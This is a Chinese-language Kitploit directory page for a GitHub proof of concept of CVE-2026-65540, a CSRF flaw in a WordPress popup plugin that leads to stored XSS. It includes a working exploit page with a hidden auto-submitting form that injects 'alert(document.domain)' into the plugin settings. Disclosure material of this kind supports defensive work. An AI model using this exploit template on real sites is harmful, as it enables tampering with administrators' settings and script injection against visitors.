Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-65540 — Popup for CF7 with Sweet Alert <= 1.6.5 - 跨站请求伪造 | Kitploit
工具/GitHubGitHub/testardou/cve-2026-65540
Web漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用Web安全
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - 跨站请求伪造

查看仓库
14小时34分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - 跨站请求伪造

插件 URL

https://wordpress.org/plugins/cf7-sweet-alert-popup/

描述

该插件的设置处理程序在其 nonce 验证中存在逻辑错误,导致所有 CSRF 保护失效。 未经身份验证的攻击者可以利用这一点,诱骗已通过身份验证的管理员访问一个包含隐藏自动提交表单的恶意页面,从而任意修改插件设置。 提交的值在存储时未经过清理,并通过 wp_head 被原样注入到每个前端页面的

POC

  1. 在单独的服务器上托管以下 HTML 页面:
root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  1. 以管理员身份登录 WordPress
  2. 访问该恶意页面
  3. (可选)导航至 http://TARGET/wp-admin/admin.php?page=cf7-simplepopup — 确认 Width 字段现在包含 500;alert(document.domain)
  4. 访问任意前端页面 — alert(document.domain) 在浏览器中执行,确认存在存储型 XSS
下载工具